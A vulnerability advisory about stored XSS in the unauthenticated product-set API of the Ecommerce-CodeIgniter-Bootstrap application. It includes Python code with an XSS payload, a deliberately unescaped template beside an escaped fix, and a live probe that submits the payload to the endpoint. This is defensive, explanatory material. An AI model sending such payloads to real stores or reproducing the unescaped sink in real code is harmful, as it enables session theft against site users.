Impact
The vulnerability resides in the hidden REST API endpoint /index.php/api/product/set of the kirilkirkov Ecommerce‑CodeIgniter‑Bootstrap application. Values supplied in the title or description parameters are not neutralized before they are emitted into a page, so an attacker who controls either parameter can inject arbitrary JavaScript that runs in the browser of any user who views the affected page. Such a script can read session data, deface the page, or perform actions with the victim's privileges. The weakness is classified as improper neutralization of input during web page generation (CWE‑79) and improper control of generation of code (CWE‑94). The attack is purely web‑based: it affects the confidentiality and integrity of user sessions, not the availability of the application.
Affected Systems
The affected system is the kirilkirkov Ecommerce‑CodeIgniter‑Bootstrap web application. The fix is contained in commit d9785f995da77bdc62fb2d34bad5f7a162c9ad23, so every checkout that predates that commit is vulnerable. The project follows a rolling release model rather than numbered releases, so users should update to that commit or a later one on a branch that includes it, and should confirm the commit is present in the deployed tree rather than relying on a version string.
Risk and Exploitability
The CVSS score is 5.3, a medium severity rating. No EPSS score has been published, and the vulnerability is not listed in the CISA KEV catalog. Exploitation needs only network access to the API endpoint: any external party who can send an HTTP request carrying a malicious title or description payload can attempt it, and because no authentication is required to reach the endpoint, exposed installations running pre‑fix code face a higher practical risk than the score alone suggests. The missing EPSS score means that exploitation‑frequency data is not yet available, not that exploitation is unlikely; a public exploit exists, so attackers already have a working payload to deploy.
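The output sink described under Impact and the request a tester would send against the endpoint described above, as an added example that is neither the project's code nor the published exploit: the template markup, the function names, the marker value and the probe helper's assumption about which page renders the stored product are all assumptions; only the endpoint path and the title and description parameter names come from the advisory. html.escape stands in for CodeIgniter's html_escape() at the output sink.

```python
import html
import urllib.parse
import urllib.request

# Endpoint and parameter names are taken from the advisory above.
ENDPOINT = "/index.php/api/product/set"
PARAMS = ("title", "description")

# A distinctive marker makes the payload easy to locate in a large page
# without knowing the surrounding markup. Constructed for this example.
MARKER = "xss-a1b2c3"
PAYLOAD = f'<script>alert("{MARKER}")</script>'


def render_product_vulnerable(product: dict) -> str:
    """Assumed product-page template that emits stored fields verbatim.

    This is the CWE-79 pattern: attacker-controlled text reaches an HTML
    context with no output encoding. A stand-in, not the project's view.
    """
    return (
        f"<h1>{product['title']}</h1>\n"
        f'<div class="description">{product["description"]}</div>'
    )


def render_product_fixed(product: dict) -> str:
    """Same template with HTML-entity encoding at the output sink.

    html.escape plays the role of CodeIgniter's html_escape(): <, >, &, "
    and ' become entities, so the browser renders the payload as text.
    """
    return (
        f"<h1>{html.escape(product['title'], quote=True)}</h1>\n"
        f'<div class="description">{html.escape(product["description"], quote=True)}</div>'
    )


def payload_executes(page: str, payload: str = PAYLOAD) -> bool:
    """True when the payload appears verbatim, i.e. a browser would run it.

    Only a verbatim match is checked; a payload that breaks out of an
    attribute context needs a different probe and is not covered here.
    """
    return payload in page


def build_set_request(base_url: str, field: str, payload: str = PAYLOAD) -> urllib.request.Request:
    """Build (but do not send) the POST a tester would use against the endpoint."""
    if field not in PARAMS:
        raise ValueError(f"unknown field {field!r}; expected one of {PARAMS}")
    body = urllib.parse.urlencode({field: payload}).encode()
    return urllib.request.Request(
        base_url.rstrip("/") + ENDPOINT,
        data=body,
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        method="POST",
    )


def probe(base_url: str, product_page_url: str, field: str = "title") -> bool:
    """Live check: submit the payload, fetch the page that shows the product,
    and report whether it survived unencoded. Requires network access and
    authorization to test the target; product_page_url is an assumption
    about where the stored value is rendered."""
    with urllib.request.urlopen(build_set_request(base_url, field), timeout=10):
        pass
    with urllib.request.urlopen(product_page_url, timeout=10) as resp:
        page = resp.read().decode("utf-8", errors="replace")
    return payload_executes(page)


if __name__ == "__main__":
    # Offline demonstration on a constructed product record.
    product = {"title": PAYLOAD, "description": "Plain description"}
    print("vulnerable template executes payload:", payload_executes(render_product_vulnerable(product)))
    print("fixed template executes payload:     ", payload_executes(render_product_fixed(product)))
```

Run the file directly for the offline comparison; probe() is the only function that touches the network and should be pointed only at an installation you are authorized to test. The check is deliberately narrow, a verbatim match on one marker, so a negative result does not prove the sink is safe, only that this payload did not survive. The durable fix is contextual output encoding at every place the stored title and description are rendered; rejecting or stripping tags on input is useful defense in depth but is not a substitute.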
OpenCVE Enrichment